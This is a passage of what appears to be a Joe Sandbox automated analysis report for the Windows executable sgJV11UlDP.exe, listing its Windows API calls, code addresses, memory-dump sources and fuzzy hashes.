                                                                      • Instruction ID: 9939d567be1ae21951fa300f882ca9363235c0aad14cd7a96026ed132ac70b09
                                                                      • Opcode Fuzzy Hash: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
                                                                      • Instruction Fuzzy Hash: 50E0E6B6710114ABCB15DB58EED087E73B9EBC5350750453FD902F36A1C6789D418B68
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                        • Part of subcall function 00406317: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                        • Part of subcall function 00406317: wsprintfA.USER32 ref: 00406367
                                                                        • Part of subcall function 00406317: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                      • Instruction ID: 1c2fb029b914f91a359858a8292288339c30c15ea481b8388e8a6490942e710a
                                                                      • Opcode Fuzzy Hash: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                      • Instruction Fuzzy Hash: C3E086326042105BD62156709E0493B62ACDF84700306083EFE47F2240D73CDC31A6A9
                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 00405B8A
                                                                      • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                      • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                      • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                      • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                      • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                      • Instruction ID: cc84bc49ba1b043e1d2796ac572287907eda555ef0407ac86e19afeaae62c947
                                                                      • Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                      • Instruction Fuzzy Hash: 7FD0C972504425AFC2102728AE0C89BBB65DB542B17028A35FDA5A22B1DB304C569A99
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,0040323B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040565D
                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040566B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                      • Instruction ID: c315ded7713b9b4a851445b4695441f34a70141ed77257200a8001455a195bbd
                                                                      • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                      • Instruction Fuzzy Hash: 33C08C30200501DBD6000B308F08F073A51AB80780F01883E608AE00B0CA318055CD2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      • Opcode ID: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                      • Instruction ID: eb4a75d755b27d484e80f31c5275a4a508bcecdbc7e909d2d8288c975618dcdd
                                                                      • Opcode Fuzzy Hash: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                      • Instruction Fuzzy Hash: A621C970C0428AAACF219F684A455BFBB709F11314F14447FE891B63D2C1BD8981CB19
                                                                      APIs
                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileMove
                                                                      • String ID:
                                                                      • API String ID: 3562171763-0
                                                                      • Opcode ID: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                      • Instruction ID: 5e69c691d72f125c1fbeda27f988c68ecdf1fc059cbca8910fb345ac15d52cae
                                                                      • Opcode Fuzzy Hash: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                      • Instruction Fuzzy Hash: ECF03031604211A7CB11BBBA9F4DD5F2A649F46368B21427FF121B22D2D6BC8902966F
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                                        • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                      • Instruction ID: b182adf31489e09453cd2335cf6310b8baddae2fb6a0e01cc8db6764b629a228
                                                                      • Opcode Fuzzy Hash: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                      • Instruction Fuzzy Hash: 9CE06DB1600215AAD702EBA4AE89CBE776CEB44318F10043BF100F00C1C67D49428A29
                                                                      APIs
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                      • Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
                                                                      • Opcode Fuzzy Hash: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                      • Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B3,00000000,00792100,000000FF,00792100,000000FF,000000FF,00000004,00000000), ref: 00405C41
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                      • Instruction ID: 0d4b5292934197368b0f45fab11a858534e2fa67ffcff62b5ec67f53c8c98dda
                                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                      • Instruction Fuzzy Hash: 2BE0E632214759ABDF506E959C00AEB776CEB05390F004436F915E2150D631E8519BA4
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031FD,00000000,00000000,0040304A,000000FF,00000004,00000000,00000000,00000000), ref: 00405C12
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                      • Instruction ID: 15bd5d27262360345a0b198e16330f5e3575b7202d491c56c7af192eda573772
                                                                      • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                      • Instruction Fuzzy Hash: C8E0EC3261876AABEF109E55AC00AEB7BACEB05760F004836FD15E3190D631E9619BA4
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(7002404C,00000004,00000040,7002403C), ref: 7002293F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
                                                                      • Instruction ID: 009d032cae48bd22e5951d7aba19eea247b768f21cfde36699470d57f031cee3
                                                                      • Opcode Fuzzy Hash: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
                                                                      • Instruction Fuzzy Hash: 3EF0A5B3508280DEE360CF7A9CC4B053FE0A318775B31456AE798D7262E3B440C68F25
                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405F01,?,?,?,?,00000002,Call), ref: 00405E97
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction ID: 4199424cdd911ade4eb2abdec76784ff09b2342150b3acef81222138bde116dc
                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction Fuzzy Hash: B7D0EC32000609BBDF115F90DD05FAB371DEB08310F004826BE59A4090D6759520AB55
                                                                      APIs
                                                                      • ShowWindow.USER32(000103F8), ref: 00401596
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
